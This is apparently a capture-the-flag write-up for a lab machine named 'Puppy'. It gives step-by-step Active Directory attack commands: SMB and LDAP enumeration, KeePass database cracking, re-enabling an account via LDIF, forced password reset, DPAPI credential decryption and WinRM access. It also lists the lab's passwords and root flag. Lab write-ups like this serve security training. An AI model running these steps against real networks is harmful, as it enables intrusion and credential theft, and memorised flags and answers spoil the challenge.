Puppy

Initial Enumeration with Nmap

We start with a full TCP scan against the target IP 10.129.122.66.

nmap -p- -sS -sV -sC 10.129.122.66

This reveals many open ports, notably:

• SMB: 445

• LDAP: 389

• Kerberos: 88

• WinRM: 5985

• HTTPAPI: 5985

• Multiple RPC services

SMB Enumeration with Valid Credentials

We begin testing credentials using nxc against SMB.

nxc smb 10.129.122.66 -u levi.james -p KingofAkron2025!

Login is successful. Next, enumerate users:

nxc smb 10.129.122.66 -u levi.james -p KingofAkron2025! --users

We find valid usernames like adam.silver, steph.cooper, and steph.cooper_adm.

Listing Shares

Using the same credentials, we list available shares:

nxc smb 10.129.122.66 -u levi.james -p KingofAkron2025! --shares

We discover a DEV share that we can access.

Accessing the DEV Share

Using smbclient, we mount the share and download files.

smbclient //10.129.122.66/DEV -U levi.james%KingofAkron2025!

Download the following files:

• KeePassXC-2.7.9-Win64.msi

• recovery.kdbx

Brute-Forcing KeePass DB

We use a KeePass brute-forcing tool to crack the .kdbx file.

./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt

Found password: liverpool

Retrieving Passwords

We find credentials for adam.silver:ILY2025!, but login fails. We switch to ant.edwards:Antman2025! which works.

Group Enumeration

List members of the developers group:

net rpc group members "developers" -U "puppy.htb"/"levi.james"%"KingofAkron2025!" -S "10.129.122.66"

We confirm that multiple users including adam.silver are developers.

Enumerate with BloodHound

We use bloodhound-python to enumerate:

bloodhound-python -c all -d puppy.htb -u ant.edwards -p Antman2025! -ns 10.129.122.66

Attempt Shadow Credential Attack

We target adam.silver for shadow credentials:

certipy-ad shadow auto -target puppy.htb -dc-ip 10.129.57.208 -username ant.edwards@puppy.htb -password 'Antman2025!' -account adam.silver@puppy.htb

No success due to account being disabled.

Enable Account Using LDIF

We create an LDIF file to re-enable the account:

dn: CN=ADAM D. SILVER,CN=Users,DC=puppy,DC=htb
changetype: modify
replace: userAccountControl
userAccountControl: 512

Execute it:

ldapmodify -x -H ldap://10.129.57.100 -D "puppy\\ant.edwards" -w 'Antman2025!' -f enable_adam.ldif

Reset Password for Adam

nxc smb 10.129.57.100 -u ant.edwards -p 'Antman2025!' -M change-password -o USER=ADAM.SILVER NEWPASS='NewPassword123!!'

Access confirmed with WinRM:

nxc winrm 10.129.57.100 -u ADAM.SILVER -p 'NewPassword123!!'

Extract user flag from Adam's desktop.

Credential Dump via DPAPI

We find a .xml.bak config with steph.cooper credentials. Use pypykatz to decode DPAPI:

pypykatz dpapi prekey password 'S-1-5-21-1487982659-1829050783-2281216199-1107' 'ChefSteph2025!'

Use masterkey to decode stored credentials and get:

• steph.cooper_adm:FivethChipOnItsWay2025!

Final WinRM Login and Root Flag

nxc winrm 10.129.114.238 -u steph.cooper_adm -p 'FivethChipOnItsWay2025!'

Navigate to Administrator's desktop and retrieve:

• root.txt: 63a979215b5a82cb97e4e594e19bff3f